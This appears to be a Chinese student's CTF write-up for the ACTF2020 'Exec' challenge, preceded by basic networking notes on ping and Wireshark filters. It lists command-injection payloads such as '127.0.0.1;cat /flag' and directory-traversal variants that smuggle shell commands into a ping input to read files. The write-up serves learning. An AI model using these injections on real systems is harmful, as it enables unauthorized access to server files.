当前位置:网站首页>[ACTF2020 新生赛]Exec 1
[ACTF2020 新生赛]Exec 1
2022-07-29 20:17:00 【借zj文章[de]BvxiE】
ping命令
如何在cmd里面ping命令
指令:racert 网址
ping一个网站和ping -t 一个网址出来的区别,前者只显示4组数据。
ipconfig /all显示自己的电脑配置
Wireshark中的一点点使用,查找时(过滤)
ping时:ip.addr ==网址 and icmp
直接网页中:
http and ip.addr == 网址
ip.addr ==网址 and tcp
27个常用的 Linux 命令!ls会列举出当前工作目录的内容(文件或文件夹)
[ACTF2020 新生赛]Exec 1
养成习惯!没事就抓个包!这个题先不借助工具,整原理!
127.0.0.1;ls
127.0.0.1;ls /,列出根目录下的文件
127.0.0.1;cat /flag,cat进行读取
或由下可得127.0.0.1;cat ../../../flag
是看wp的,将知识点进行梳理
1.127.0.0.1;cat index.php,查找一下里面的信息
isset ()函数是用于确定变量是否已设置且不为空;换句话说,仅当变量不为null时才返回true。
2.目录遍历
简单了解一下目录遍历!127.0.0.1;ls ../
127.0.0.1;ls ../../
127.0.0.1;ls ../../../和127.0.0.1;ls ../../../../效果一样,所以一般只要设的足够多就可以!
命令注入
这次仅仅了解一下命令注入符号!
节选于上个链接!
可参考文章:https://blog.csdn.net/m0_47745762/article/details/118932465?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165848802716782248535320%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=165848802716782248535320&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-118932465-null-null.142v33experiment_2_v1,185v2control&utm_term=actf2020%20%E6%96%B0%E7%94%9F%E8%B5%9B%5Dexec%2019&spm=1018.2226.3001.4187
及文章:https://blog.csdn.net/wangyuxiang946/article/details/120995294?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165848802716782248535320%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=165848802716782248535320&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-2-120995294-null-null.142v33experiment_2_v1,185v2control&utm_term=actf2020%20%E6%96%B0%E7%94%9F%E8%B5%9B%5Dexec%2019&spm=1018.2226.3001.4187
边栏推荐
- 万字总结:分布式系统的38个知识点
- Omni-channel e-commerce | How can well-known domestic cosmeceuticals seize the opportunity to achieve rapid growth?
- 336. 回文对
- JS实现百叶窗特效
- JSP Servlet JDBC MySQL CRUD Sample Tutorial
- Unity判断字符串是否可以转为float类型
- ds1302——Bin brother 51
- 诺氟沙星-DNA复合物|半乳糖化脂质体-聚阳离子-DNA复合物|注意事项
- 五个供应商销售谈判策略的识别以及应对它们的方法
- :style中颜色使用函数动态获取赋值
猜你喜欢
JMeter usage tutorial (2)
The ambition of glory: "high-end civilians" in a smart world
优惠券系统设计思想
剑指 Offer II 097. 子序列的数目
磁性层状双金属氢氧化物和酶-DNA复合物|聚乙烯亚胺-DNA复合物(PEI/DNA)|作用机理
荧光量子点修饰siRNA-QDs|纳米金修饰siRNA-Au(RNA修饰方式方法)
OAuth,JWT ,OIDC你们搞得我好乱啊
藻酸盐/PEI/DNA复合载体|脂质-鱼精蛋白-DNA复合物|合成方法
Setinel 原理简介
In the past six months, I have done those things about the automatic return of the transaction link...
随机推荐
错误解决:Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255]
【数据库】mysql日期格式转换
百度实习学弟深夜吐槽:原来大厂是这种生活啊
核壳二氧化钛纳米颗粒修饰DNA|二氢杨梅素修饰DNA药物|相关介绍
The difference between analog, digital and switching
[mathematical foundation] higher mathematics concept learning
Summary of scratch learning related materials
Huawei laptop keyboard locked (how does the laptop keyboard light up)
R语言对airbnb数据nlp文本挖掘、地理、词云可视化、回归GAM模型、交叉验证分析
关于安装软件时x86 ,x64,x86_64,ARM 64, ARM 32 的选择
Related phrases include usage and collocation (include)
Internship: use easypoi to import and export excel table data
LOG4J Learning
模型推理模板
常用电源符号含义分享
The difference between uri and url is simple to understand (what is the difference between uri and url)
Kotlin - 协程作用域 CoroutineScope、协程构建器 CoroutineBuilder、协程作用域函数 CoroutineScope Functiom
leetcode:952. 按公因数计算最大组件大小【并查集】
Data visualization ---- web page displays temperature and humidity
A dish hold up valuations billions of mt. Pickled fish, can move beyond the edge food safety?